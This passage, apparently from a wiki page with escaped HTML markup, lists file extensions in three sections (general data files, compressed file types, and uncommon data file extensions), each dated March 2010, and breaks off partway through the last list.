.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
